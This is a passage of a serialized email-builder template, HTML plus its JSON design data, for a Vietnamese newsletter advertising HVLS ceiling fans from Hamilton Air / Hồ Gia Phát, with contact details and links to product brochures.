align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">-------o0o------<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83c\\udf10\\u00a0<a href=\\\"https:\\/\\/www.bigfans.vn\\/\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83c\\udf10\\u00a0<a href=\\\"https:\\/\\/quattran.co\\/\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":9,\\\"u_column\\\":19,\\\"u_content_text\\\":7,\\\"u_content_image\\\":15,\\\"u_content_button\\\":10,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4,\\\"u_content_heading\\\":7,\\\"u_content_text_deprecated\\\":1},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167194545-logo_sunon.png\\\",\\\"width\\\":1280,\\\"height\\\":375,\\\"maxWidth\\\":\\\"81%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">\\u00a0Qu\\u1ea1t treo tr\\u1ea7n c\\u00e1nh l\\u1edbn HVLS c\\u00f3 th\\u1ec3 s\\u1eed d\\u1ee5ng \\u0111\\u1ec3 t\\u1ea1o ra m\\u00f4i tr\\u01b0\\u1eddng th\\u00e2n thi\\u1ec7n trong c\\u00e1c lo\\u1ea1i kh\\u00f4ng gian nh\\u01b0 nh\\u00e0 \\u1edf, v\\u0103n ph\\u00f2ng v\\u00e0 nh\\u00e0 m\\u00e1y c\\u00f4ng nghi\\u1ec7p.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"9BLYLfou98\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"28px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"M\\u1ed9t kho\\u1ea3nh kh\\u1eafc th\\u01b0 gi\\u00e3n v\\u1edbi l\\u00e0n gi\\u00f3 m\\u1ea1nh v\\u00e0 d\\u1ecbu d\\u00e0ng\\\"}},{\\\"id\\\":\\\"-K-i8ZxoiQ\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167271523-Powerful1-02.jpg\\\",\\\"width\\\":1581,\\\"height\\\":544},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"VyLcw40BDA\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h4\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"16px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_3\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG\\\"}},{\\\"id\\\":\\\"Al64RPrqki\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Powerful HVLS Fan series 1\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#fbfdff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"2G9uTxQqI5\\\",\\\"cells\\\":[1,1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"6ubno4Pego\\\",\\\"contents\\\":[{\\\"id\\\":\\\"H9oT6H7xXx\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">MODERN HVLS<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"8PkZJyt_vH\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jS1PqOS7Xl\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">SUNON SERIES 1<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"6gueSe8f4h\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jWq9lKAUVa\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#2dc26b\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">SUNON SERIES 3<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"7_rSdc1TtT\\\",\\\"contents\\\":[{\\\"id\\\":\\\"x_22-LcpU4\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#843fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">SUNON SERIES 10<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"-tkf6Nz79p\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"WY_VQy7N9v\\\",\\\"contents\\\":[{\\\"id\\\":\\\"bhZ2lXmngD\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 